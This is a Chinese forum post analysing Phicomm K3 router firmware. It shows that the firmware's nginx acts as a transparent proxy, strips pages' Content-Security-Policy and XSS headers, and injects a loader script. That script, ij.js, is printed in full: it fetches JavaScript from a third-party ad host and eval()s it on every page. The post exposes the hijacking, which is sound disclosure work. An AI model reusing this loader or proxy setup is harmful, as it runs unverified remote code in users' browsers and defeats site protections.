非专业人士,没功夫深入研究分析,仅供参考
首先,抓包获取固件链接:
http://power.qiqizz.com/img/SW_K3_703005003_V21.6.14.122.bin
看见没,域名都不再是熟悉的斐讯了,服务器变卖了?哈哈~
样本MD5:59708fe297ad619910e5943bf2b963f4
固件版本:V21.6.14.122
编译日期:2018年11月19日
此次换了一个工作人员编译,工作目录 /home/qingru.meng/work/,说明他的中文名mengqingru?mengqingru 你妈喊你回家吃饭!
使用7zip右键打开就可以查看固件文件系统了,发现相对于V21.6.14.109的变化:
web服务端改换成nginx,/usr/sbin/nginx 和 /usr/sbin/nginx_op 两个nginx进程
/etc/nginx/nginx.conf 配置文件:
# /etc/nginx/nginx.conf as extracted from the firmware. Reviewer comments
# added; every directive below is reproduced verbatim from the post.
#
# Worker processes run as root, so any flaw in nginx or in the custom
# phi_request module configured below executes with full privileges.
user root;
worker_processes 2;
#error_log /tmp/usr/nginx/logs/error.log notice;
# Error output is discarded and access logging is switched off further
# down, so the proxy leaves no local trace of what it forwarded or rewrote.
error_log /dev/null;
pid /var/lib/nginx/nginx.pid;
events {
worker_connections 2048;
}
http {
map_hash_bucket_size 64;
# $expires is computed here but only referenced by the commented-out
# "expires $expires;" below, so the map has no effect as written.
map $sent_http_content_type $expires {
default 3600;
text/html 3600;
text/javascript 3600;
application/javascript 3600;
application/x-javascript 3600;
}
include mime.types;
default_type application/octet-stream;
#sendfile on;
#keepalive_timeout 10;
# Keeps the upstream connection alive even if the client goes away.
proxy_ignore_client_abort on;
client_body_temp_path /var/lib/nginx/client_body_temp;
# Request bodies up to 1000m are accepted and spooled under /var/lib.
client_max_body_size 1000m;
proxy_temp_path /var/lib/nginx/proxy_temp;
fastcgi_temp_path /var/lib/nginx/fastcgi_temp;
uwsgi_temp_path /var/lib/nginx/uwsgi_temp;
scgi_temp_path /var/lib/nginx/scgi_temp;
access_log off;
# $purge_method is not referenced anywhere else in this file.
map $request_method $purge_method {
PURGE 1;
default 0;
}
# $allow carries only a default of 1, so the "return 403" guard in the
# location block below can never fire with this map.
map $host $allow {
default 1;
}
server{
# proxy_pass below uses variables, so upstream hostnames are resolved
# per request through the router's own resolver on 127.0.0.1.
resolver 127.0.0.1;
resolver_timeout 200s;
# Bound on every interface. Nothing in this file restricts who may
# connect; presumably client HTTP traffic is redirected here by the
# firewall (that redirection is not visible in this config).
listen 0.0.0.0:8080;
location / {
root html;
index index.html index.htm;
# Forwards each request to whatever host the client asked for, i.e. the
# server acts as a transparent forward proxy for all HTTP traffic it sees.
proxy_pass $scheme://$host$request_uri;
proxy_set_header HOST $http_host;
proxy_buffering off;
proxy_buffers 256 4k;
proxy_max_temp_file_size 0k;
proxy_connect_timeout 300;
proxy_send_timeout 600;
proxy_read_timeout 600;
proxy_next_upstream error timeout invalid_header http_502;
# Asks the upstream for an uncompressed body — presumably so the
# response can be rewritten below (body filtering needs plain text).
proxy_set_header Accept-Encoding "";
proxy_redirect off;
#proxy_cache cache_zone;
#proxy_cache_valid 200 302 1m;
#proxy_cache_valid 301 1m;
#proxy_cache_valid any 1m;
# Cache-Control and Expires are dropped from upstream responses before
# they reach the client (proxy_ignore_headers also stops nginx itself
# from honouring them).
proxy_ignore_headers Cache-control;
proxy_hide_header Cache-control;
proxy_ignore_headers Expires;
proxy_hide_header Expires;
# The origin's browser-side security headers are removed from the
# response. A site's CSP or XSS-protection header that would otherwise
# block an inline/third-party script never reaches the browser, which
# is what lets the injected loader script run on that site's pages.
proxy_hide_header X-XSS-Protection;
proxy_hide_header X-WebKit-CSP;
proxy_hide_header X-Content-Type-Options;
proxy_hide_header X-Content-Security-Policy;
proxy_hide_header Content-Security-Policy;
#proxy_cache_type_valid $expires;
#expires $expires;
gunzip off;
#gunzip_buffers 16 8k;
gzip off;
#gzip_proxied any;
# gzip is off, so the gzip_* tuning below is inert as written.
gzip_min_length 1k;
gzip_buffers 4 16k;
gzip_http_version 1.0;
gzip_comp_level 2;
# NOTE(review): "text/ javascript" contains a stray space and would be
# parsed as two separate tokens; likely a transcription or upstream typo.
gzip_types text/plain application/x-javascript text/javascript application/javascript application/css text/css application/xml text/ javascript application/x-httpd-php image/jpeg image/gif image/png;
gzip_vary off;
gzip_disable "MSIE [1-6]\.";
# sub_filter_fixed is not a stock nginx directive (stock is sub_filter);
# presumably a custom variant keyed on the 'text/html' content type. As
# written it replaces '</body>' with '</body>' (a no-op), so the actual
# insertion of the loader script is presumably done by the phi_request
# module below — TODO confirm against the module binary.
sub_filter_once on;
sub_filter_fixed 'text/html' '</body>' '</body>';
# phi_request_* are non-standard directives from a custom module whose
# semantics are not visible here. They name a control server
# (maapi.3g.qq.com:8080, /v1/queryUrl), limit processing to text/html,
# and list host patterns and static-asset path patterns that are
# presumably exempted from processing.
phi_request_enable on;
phi_request_server "maapi.3g.qq.com";
phi_request_port "8080";
phi_request_command "/v1/queryUrl";
phi_request_content_type 'text/html';
phi_request_white_url efrouter.sparta.html5.qq.com;
#phi_request_white_url devmaapi.3g.qq.com;
phi_request_white_url '\S*.3g.qq.com';
phi_request_white_url '\S*.baidu.com';
phi_request_white_loc '[^?]*.ico|[^?]*.js|[^?]*.css|[^?]*.jpeg|[^?]*.jpg|[^?]*.png';
# Never true with the $allow map above (default 1 only).
if ($allow ~ ^0){
return 403;
}
}
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
}
}
nginx加载的广告劫持接口文件 /etc/nginx/ij.js 如下:
// /etc/nginx/ij.js as shipped in the firmware (reviewer comments added;
// the code itself is verbatim). Presumably inserted by the nginx module
// into text/html responses; it loads and executes a remote script.
;(function () {
// Only run in the top-level document, never inside a frame.
if(window.top !== window) return;
// Global flag so the loader runs at most once per page, even if the
// snippet is injected more than once.
if(window.hasexecinjectjs) { return; };
window.hasexecinjectjs = true;
// %ROUTERMAC% is a template placeholder; presumably replaced with the
// router's MAC (cf. et0macaddr found in nginx_op) before injection,
// exposing the device identity to the remote script — TODO confirm.
window.veryroutermac='%ROUTERMAC%';
// Epoch seconds at today's local midnight: a cache-buster that changes
// once per day, so the remote script is refetched daily at most.
var daytime = new Date(new Date().setHours(0, 0, 0, 0)) / 1000;
// Third-party ad server; the visited site has no control over its content.
var url = 'https://waic.withad.cn/ads.4ldqpe3.js?_=' + daytime;
if (window.XMLHttpRequest) {
var xhr = new XMLHttpRequest();
xhr.open('GET', url);
xhr.onreadystatechange = function () {
if (xhr.readyState == 4 && xhr.status == 200) {
var text = xhr.responseText
// SECURITY: eval() of a body fetched over the network — whatever
// waic.withad.cn returns runs with the origin and privileges of every
// page this snippet is injected into, with no integrity check at all.
eval(text);
}
}
xhr.send(null);
return;
}
// Fallback when XMLHttpRequest is unavailable: load the same URL as a
// script element, which is equally unverified.
var script=document.createElement('script');
script.src = url;
document.head && document.head.appendChild(script);
})();
在 /usr/sbin/nginx_op 中发现了 TR069 字符串,并且它会在防火墙中插入一条规则:
iptables -t nat -i PREROUTING -i br0 -p tcp -d 101.95.50.0/24 -j ACCEPT
接受目的地址为 101.95.50.*(归属地为上海)的 TCP 连接
fw_version hw_id et0macaddr product_id
由服务器根据固件种类、版本、MAC 地址精确控制广告展现?
斐讯啊斐讯,真不知道该说什么了。
nginx插广告为新增的方法,旧版固件采用 up_script 插入,历史相关帖子:
https://www.right.com.cn/forum/thread-227504-1-1.html
https://www.right.com.cn/forum/thread-240926-1-1.html